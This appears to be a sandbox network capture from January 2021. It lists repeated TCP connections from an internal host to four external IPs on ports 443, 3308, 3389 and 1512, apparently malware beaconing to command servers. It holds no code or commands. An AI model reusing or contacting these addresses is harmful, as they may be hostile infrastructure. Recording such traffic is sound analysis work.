Jan 11, 2021 16:53:06.474010944 CET	49259	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:06.528417110 CET	443	49259	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:06.528623104 CET	49259	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:06.542503119 CET	49259	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:06.542820930 CET	49259	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:06.594810963 CET	443	49259	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:06.595097065 CET	49259	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:06.647094011 CET	443	49259	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:06.764590979 CET	443	49259	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:06.764609098 CET	443	49259	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:06.764750004 CET	49259	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:06.770927906 CET	49259	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:06.823084116 CET	443	49259	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:06.881942987 CET	49260	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:06.925240040 CET	3308	49260	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:06.925333977 CET	49260	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:06.926166058 CET	49260	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:06.969176054 CET	3308	49260	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:06.979872942 CET	3308	49260	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:06.979891062 CET	3308	49260	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:06.980063915 CET	49260	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:06.990921974 CET	49260	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:07.036026001 CET	3308	49260	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:07.036638021 CET	49260	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:07.041537046 CET	49260	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:07.041688919 CET	49260	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:07.084762096 CET	3308	49260	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:07.084872961 CET	49260	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:07.124305964 CET	3308	49260	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:07.128036976 CET	3308	49260	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:07.128134012 CET	3308	49260	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:07.240900040 CET	3308	49260	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:07.240922928 CET	3308	49260	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:07.241156101 CET	49260	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:07.246678114 CET	49260	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:07.289705038 CET	3308	49260	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:07.355003119 CET	49261	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:07.409959078 CET	3389	49261	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:07.410084963 CET	49261	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:07.411703110 CET	49261	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:07.465307951 CET	3389	49261	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:07.492309093 CET	3389	49261	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:07.492361069 CET	3389	49261	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:07.492590904 CET	49261	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:07.504235983 CET	49261	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:07.567059994 CET	3389	49261	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:07.567312002 CET	49261	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:07.577409029 CET	49261	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:07.577657938 CET	49261	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:07.631225109 CET	3389	49261	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:07.631478071 CET	49261	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:07.670945883 CET	3389	49261	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:07.685235023 CET	3389	49261	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:07.685280085 CET	3389	49261	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:07.775512934 CET	3389	49261	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:07.775543928 CET	3389	49261	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:07.775748968 CET	49261	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:07.775830984 CET	49261	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:07.781343937 CET	49261	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:07.840457916 CET	3389	49261	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:07.900882006 CET	49262	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:07.953891993 CET	1512	49262	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:07.954075098 CET	49262	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:07.955724955 CET	49262	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:08.008683920 CET	1512	49262	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:08.015943050 CET	1512	49262	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:08.015984058 CET	1512	49262	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:08.016138077 CET	49262	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:08.016190052 CET	49262	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:08.030370951 CET	49262	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:08.084462881 CET	1512	49262	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:08.084742069 CET	49262	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:08.088263035 CET	49262	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:08.088356018 CET	49262	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:08.141196012 CET	1512	49262	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:08.141491890 CET	49262	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:08.180708885 CET	1512	49262	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:08.194350004 CET	1512	49262	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:08.194395065 CET	1512	49262	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:08.294224977 CET	1512	49262	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:08.294245958 CET	1512	49262	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:08.294552088 CET	49262	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:08.300086021 CET	49262	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:08.352756023 CET	1512	49262	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:08.411432981 CET	49263	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:08.463212967 CET	443	49263	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:08.463460922 CET	49263	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:08.464956045 CET	49263	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:08.519195080 CET	443	49263	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:08.533596992 CET	443	49263	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:08.533793926 CET	49263	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:08.548770905 CET	49263	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:08.602958918 CET	443	49263	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:08.603141069 CET	49263	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:08.613364935 CET	49263	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:08.613795042 CET	49263	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:08.665587902 CET	443	49263	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:08.665828943 CET	49263	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:08.702848911 CET	443	49263	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:08.717716932 CET	443	49263	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:08.835242033 CET	443	49263	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:08.835295916 CET	443	49263	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:08.835478067 CET	49263	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:08.841001987 CET	49263	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:08.892795086 CET	443	49263	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:08.966409922 CET	49264	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:09.011028051 CET	3308	49264	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:09.011194944 CET	49264	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:09.012413025 CET	49264	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:09.055440903 CET	3308	49264	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:09.070760012 CET	3308	49264	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:09.070786953 CET	3308	49264	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:09.070842981 CET	49264	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:09.077513933 CET	49264	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:09.123215914 CET	3308	49264	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:09.123277903 CET	49264	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:09.127266884 CET	49264	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:09.127418041 CET	49264	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:09.170455933 CET	3308	49264	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:09.170566082 CET	49264	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:09.211031914 CET	3308	49264	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:09.213526011 CET	3308	49264	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:09.213629961 CET	3308	49264	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:09.326351881 CET	3308	49264	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:09.326387882 CET	3308	49264	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:09.326569080 CET	49264	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:09.330728054 CET	49264	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:09.373836994 CET	3308	49264	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:09.443484068 CET	49265	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:09.497169971 CET	3389	49265	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:09.497292042 CET	49265	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:09.498505116 CET	49265	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:09.552644968 CET	3389	49265	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:09.589266062 CET	3389	49265	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:09.589292049 CET	3389	49265	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:09.589402914 CET	49265	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:09.603215933 CET	49265	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:09.675823927 CET	3389	49265	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:09.676026106 CET	49265	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:09.681699038 CET	49265	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:09.681830883 CET	49265	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:09.736255884 CET	3389	49265	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:09.736366034 CET	49265	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:09.776236057 CET	3389	49265	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:09.789942026 CET	3389	49265	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:09.789963961 CET	3389	49265	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:09.880815983 CET	3389	49265	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:09.881022930 CET	49265	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:09.881129026 CET	3389	49265	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:09.881233931 CET	49265	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:09.886785984 CET	49265	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:09.942493916 CET	3389	49265	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:10.005351067 CET	49266	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:10.058289051 CET	1512	49266	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:10.058389902 CET	49266	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:10.059690952 CET	49266	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:10.112607956 CET	1512	49266	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:10.120095015 CET	1512	49266	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:10.120130062 CET	1512	49266	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:10.120213985 CET	49266	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:10.120239019 CET	49266	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:10.134999990 CET	49266	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:10.189270973 CET	1512	49266	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:10.189461946 CET	49266	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:10.198453903 CET	49266	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:10.198714972 CET	49266	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:10.251631021 CET	1512	49266	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:10.252015114 CET	49266	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:10.288749933 CET	1512	49266	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:10.304925919 CET	1512	49266	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:10.404253960 CET	1512	49266	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:10.404301882 CET	1512	49266	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:10.404460907 CET	49266	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:10.407270908 CET	49266	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:10.460107088 CET	1512	49266	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:10.526773930 CET	49267	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:10.582053900 CET	443	49267	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:10.584897041 CET	49267	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:10.619575024 CET	49267	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:10.672058105 CET	443	49267	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:10.686743975 CET	443	49267	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:10.688905954 CET	49267	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:10.790050983 CET	49267	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:10.844777107 CET	443	49267	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:10.844875097 CET	49267	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:10.849024057 CET	49267	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:10.849174976 CET	49267	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:10.901518106 CET	443	49267	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:10.904927969 CET	49267	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:10.957206964 CET	443	49267	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:11.075267076 CET	443	49267	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:11.075288057 CET	443	49267	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:11.075438023 CET	49267	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:11.075488091 CET	49267	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:11.078630924 CET	49267	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:11.130945921 CET	443	49267	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:11.188405037 CET	49268	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:11.232857943 CET	3308	49268	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:11.232954025 CET	49268	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:11.233701944 CET	49268	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:11.276819944 CET	3308	49268	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:11.289829969 CET	3308	49268	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:11.289856911 CET	3308	49268	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:11.289982080 CET	49268	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:11.481532097 CET	49268	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:11.526835918 CET	3308	49268	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:11.526923895 CET	49268	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:11.531259060 CET	49268	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:11.531369925 CET	49268	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:11.574513912 CET	3308	49268	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:11.574605942 CET	49268	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:11.614865065 CET	3308	49268	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:11.618546009 CET	3308	49268	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:11.618562937 CET	3308	49268	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:11.729693890 CET	3308	49268	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:11.729722977 CET	3308	49268	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:11.729787111 CET	49268	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:11.732384920 CET	49268	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:11.775516033 CET	3308	49268	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:11.943320036 CET	49269	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:11.999397993 CET	3389	49269	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:11.999587059 CET	49269	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:12.395605087 CET	49269	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:12.454526901 CET	3389	49269	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:12.480015993 CET	3389	49269	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:12.480065107 CET	3389	49269	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:12.482119083 CET	49269	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:12.482167006 CET	49269	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:12.490295887 CET	49269	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:12.556183100 CET	3389	49269	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:12.556276083 CET	49269	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:12.562310934 CET	49269	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:12.562427998 CET	49269	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:12.619038105 CET	3389	49269	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:12.620028973 CET	49269	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:12.661488056 CET	3389	49269	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:12.674185991 CET	3389	49269	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:12.674233913 CET	3389	49269	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:12.766077995 CET	3389	49269	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:12.766123056 CET	3389	49269	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:12.767144918 CET	49269	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:12.773055077 CET	49269	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:12.849925995 CET	49269	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:12.954631090 CET	49270	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:12.961617947 CET	3389	49269	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:13.007663965 CET	1512	49270	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:13.007817984 CET	49270	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:13.009203911 CET	49270	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:13.062192917 CET	1512	49270	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:13.069233894 CET	1512	49270	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:13.069267988 CET	1512	49270	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:13.069329023 CET	49270	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:13.073029995 CET	49270	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:13.078530073 CET	49270	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:13.133012056 CET	1512	49270	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:13.133258104 CET	49270	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:13.143841028 CET	49270	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:13.144247055 CET	49270	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:13.197211981 CET	1512	49270	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:13.197448015 CET	49270	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:13.237039089 CET	1512	49270	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:13.251327038 CET	1512	49270	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:13.354135036 CET	1512	49270	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:13.354177952 CET	1512	49270	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:13.354351997 CET	49270	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:13.359858990 CET	49270	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:13.412798882 CET	1512	49270	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:13.471348047 CET	49271	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:13.523519993 CET	443	49271	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:13.523679972 CET	49271	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:13.525053024 CET	49271	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:13.576977015 CET	443	49271	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:13.591594934 CET	443	49271	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:13.591686010 CET	49271	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:13.598210096 CET	49271	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:13.652618885 CET	443	49271	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:13.652901888 CET	49271	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:13.664099932 CET	49271	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:13.664279938 CET	49271	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:13.716370106 CET	443	49271	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:13.716638088 CET	49271	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:13.754858017 CET	443	49271	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:13.768666983 CET	443	49271	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:13.886565924 CET	443	49271	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:13.886609077 CET	443	49271	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:13.886657000 CET	49271	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:13.886673927 CET	49271	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:13.891808033 CET	49271	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:13.943869114 CET	443	49271	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:13.995953083 CET	49272	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:14.039175987 CET	3308	49272	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:14.039444923 CET	49272	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:14.040427923 CET	49272	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:14.083467960 CET	3308	49272	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:14.097595930 CET	3308	49272	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:14.097614050 CET	3308	49272	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:14.097683907 CET	49272	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:14.097734928 CET	49272	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:14.109283924 CET	49272	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:14.156522989 CET	3308	49272	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:14.156671047 CET	49272	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:14.166193008 CET	49272	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:14.166423082 CET	49272	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:14.209503889 CET	3308	49272	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:14.209656000 CET	49272	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:14.250010967 CET	3308	49272	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:14.252696991 CET	3308	49272	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:14.252717018 CET	3308	49272	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:14.364535093 CET	3308	49272	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:14.364557981 CET	3308	49272	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:14.364650965 CET	49272	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:14.369975090 CET	49272	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:14.413080931 CET	3308	49272	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:14.481244087 CET	49273	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:14.535402060 CET	3389	49273	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:14.535530090 CET	49273	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:14.537473917 CET	49273	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:14.592267036 CET	3389	49273	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:14.618830919 CET	3389	49273	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:14.618872881 CET	3389	49273	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:14.618985891 CET	49273	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:14.619045973 CET	49273	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:14.630661964 CET	49273	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:14.695668936 CET	3389	49273	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:14.695813894 CET	49273	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:14.701797962 CET	49273	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:14.701858044 CET	49273	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:14.756078005 CET	3389	49273	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:14.756247044 CET	49273	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:14.796446085 CET	3389	49273	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:14.810574055 CET	3389	49273	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:14.810606956 CET	3389	49273	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:14.901585102 CET	3389	49273	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:14.901628971 CET	3389	49273	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:14.901705027 CET	49273	3389	192.168.2.22	5.100.228.233
